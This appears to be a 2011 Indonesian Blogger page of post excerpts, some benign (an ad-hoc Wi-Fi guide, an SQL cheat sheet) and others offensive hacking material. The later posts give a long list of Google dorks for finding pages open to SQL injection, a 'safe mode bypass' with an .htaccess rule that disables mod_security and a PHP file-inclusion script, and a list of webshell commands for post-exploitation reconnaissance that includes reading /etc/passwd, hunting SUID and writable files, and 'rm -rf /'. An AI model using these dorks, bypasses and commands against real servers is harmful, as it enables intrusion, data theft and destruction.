http://aux.iconpedia.net/uploads/10875870971013046993.pnghttp://aux.iconpedia.net/uploads/1540998406962263282.png !

Featured Post 1 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 2 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 3 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 4 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 5 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 7 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 6 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Desember 27, 2011

Jaringan Ad-Hoc di Windows 7

1.Klik Start -> Control Panel -> Network and Internet -> View Network Status And Tasks
2.Kemudian pilih Set up a new connection or network
3.Setelah itu pilih Set up a wireless ad hoc (computer-to-computer) network

4.Maka akan keluar set up wireless ad hocnya klik next untuk melanjutkannya


5.Isi Network name dengan nama yg nantinya akan menjadi nama jaringan Ad-Hoc anda, untuk Security type bisa anda tentukan sesuai dengan keinginan anda, pada contoh kali ini security typenya saya isi dengan No authentication (Open) karena saya membuat jaringan ini untuk tujuan bermain game, tetapi jika anda membuat jaringan ini untuk pertukaran data sebaiknya Security typenya diisi dengan  WPA2-Personal kemudian isi Security Keynya. Setelah semuanya telah diisi klik Next.



6.Maka proses instalasi jaringan Ad-Hocnya akan berjalan, tunggu hingga selesai.



7.Jika sudah selesai klik Close
8.Anda dapat mengecek jaringan Ad-Hoc yg telah anda buat dengan cara mengklik icon wireless yg ada di sudut kanan monitor, jika anda berhasil maka jaringan Ad-Hoc anda akan ada di daftar jaringan wireless yg ada.
Jaringan Ad-Hoc tampaknya sangat sederhana, namun sebenarnya mempunyai cara kerja yang rumit serta mempunyai banyak keterbatasan dibandingkan dengan penggunaan Access Point, Perlu Anda ketahui bahwa performance jaringan Ad Hoc akan turun secara drastis dengan bertambahnya jumlah komputer karena cara kerja Ad Hoc yang tidak menggunakan “server” terpusat, Karena dalam jaringan Ad-Hoc setiap komputer bisa menjadi server. Karena itulah, jaringan Ad-Hoc tidak cocok digunakan untuk jaringan yang memerlukan performance tinggi dengan jumlah client yang banyak. Karena cara kerja Ad Hoc, sangat disarankan untuk tidak menggunakan komputer lebih dari 5 agar performance yang didapatkan masih memuaskan.


*************************[patch]******************************** (Continue)..

(Continue)..

Desember 25, 2011

Perintah – perintah dalam SQL



Select Statement
SELECT “column_name” FROM “table_name”


Distinct
SELECT DISTINCT “column_name”
FROM “table_name”



Where
SELECT “column_name”
FROM “table_name”
WHERE “condition”



And/Or
SELECT “column_name”
FROM “table_name”
WHERE “simple condition”
{[AND|OR] “simple condition”}+



In
SELECT “column_name”
FROM “table_name”
WHERE “column_name” IN (‘value1′, ‘value2′, …)


Between
SELECT “column_name”
FROM “table_name”
WHERE “column_name” BETWEEN ‘value1′ AND ‘value2′


Like
SELECT “column_name”
FROM “table_name”
WHERE “column_name” LIKE {PATTERN}


Order By
SELECT “column_name”
FROM “table_name”
[WHERE "condition"]
ORDER BY “column_name” [ASC, DESC]


Count
SELECT COUNT(“column_name”)
FROM “table_name”


Group By
SELECT “column_name1″, SUM(“column_name2″)
FROM “table_name”
GROUP BY “column_name1″


Having
SELECT “column_name1″, SUM(“column_name2″)
FROM “table_name”
GROUP BY “column_name1″
HAVING (arithematic function condition)


Create Table Statement
CREATE TABLE “table_name”
(“column 1″ “data_type_for_column_1″,
“column 2″ “data_type_for_column_2″,
… )


Drop Table Statement
DROP TABLE “table_name”


Truncate Table Statement
TRUNCATE TABLE “table_name”


Insert Into Statement
INSERT INTO “table_name” (“column1″, “column2″, …)
VALUES (“value1″, “value2″, …)


Update Statement
UPDATE “table_name”
SET “column_1″ = [new value]
WHERE {condition}


Delete From Statement
DELETE FROM “table_name”
WHERE {condition} (Continue)..

(Continue)..

Desember 14, 2011

Cara simple membuat website flash dgn template

langkah 1: mencari flash template gratis
pake mesin google, gunakan keyword :

Code:
allinurl:flash template ext:swf
nah keluar tuh jeroan2 flash template.silahkan dilihat, tapi klo mw langsung di save di kompi kita, cari yg ada tulisan awalnya [flash] pasti banyak tuh di setiap halaman....trus klik kanan pada linknya dan pilih "save link as"

cara lainnya yg lebih mudah adalah kita ke http://search.4shared.com/ kemudian ketik pada searchnya
Code:
flash template
pasti dapat.... yg keren-keren lagi tp dlm bentuk kompressi
swf yg kita dapat harus didecompiler dulu pake swf decompiler, (Continue)..

(Continue)..

Desember 09, 2011

White MSN Buddy Emoticons

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~patch~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (Continue)..

(Continue)..

Desember 07, 2011

Cwin d012x h4vij


inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
(Continue)..

(Continue)..

Desember 05, 2011

[Ask] ByPass Safe Mode ON

ada 3 cara yaitu melalui .htaccess , ini.php dan php.ini
php.ini

... oke langsung saja menuju c0de nya ……………

.htaccess
Code:
<IfModule mod_security.c&gt; SecFilterEngine Off SecFilterScanPOST Off </IfModule>

ini.php
Code:

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"file"sansursansursansur93;);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"ss"sansursansursansur93;);
?>

php.ini
Code:

safe_mode = off
exec = On
shell_exec = On


########
Write By : Wan Madehope or HVM 999
####### (Continue)..

(Continue)..

Desember 03, 2011

Perintah2 Webshell


cat ./../mainfile.php = Config file.

ls -la = Lists directory’s.

ifconfig {eth0 etc} = Ipconfig equiv.

ps aux – Show running proccess’s.

gcc in_file -o out_file – Compile c file.

cat /etc/passwd – List’s accounts.


sudo – Superuser Do run a command as root provided you have perms
in /etc/sudoers.

id – Tells you what user your logged in as.

which wget curl w3m lynx – Check’s to see what downloaders are
present.

uname -r – Shows all release info (or) cat /etc/release.

uname -a – Shows all kernal info (or) cat /etc/issue

last -30 – Last logged 30 ip’s can change to desired number.

useradd – Create new user account.

usermod – Modify user account.

w – See who is currently logged on.

locate password.txt – Locates password.txt in current dur can use *.

rm -rf / – Please be carefull with this command, i cannot stress this
enough.

arp -a – Lists other machines are on the same subnet.

lsattr -va – ls file attributes on linux second extended file system

find / -type f -perm -04000 -ls – Finds suid files.

find . -type f -perm -04000 -ls – Finds suid files in current dir.

find / -type f -perm -02000 -ls – Finds all sgid files.

find / -perm -2 -ls – Finds all writable files and folders.

find . -perm -2 -ls – Finds all writable files and folders in current dir.

find / -type f -name .bash_history – Finds bash history.

netstat -an | grep -i listen – shows open ports.

cut -d: -f1,2,3 /etc/passwd | grep :: – From memory creates a user
with no pass.

find /etc/ -type f -perm -o+w 2> /dev/null – Write in /etc/passwd?.

cat /proc/version /proc/cpuinfo – Cpu info.

locate gcc- Finds gcc if installed.

set – Display system variables.

echo $path- Echo current path.

lsmod- Dumps kernal modules.

mount/df- Check mounted file system.

rpm -qa- Check patch level for RedHat 7.0.

dmesg- Check hardware ino.

cat /etc/syslog.conf – Log file.

uptime – Uptime check.

cat /proc/meminfo – Memory check.

find / -type f -perm -4 -print 2> /dev/null- Find readble files.

find / -type f -perm -2 -print 2> /dev/null – Find writable files.

chmod ### $folder – Chmod folder.

ls -l -b – Verbosly list directory’s



(Continue)..

(Continue)..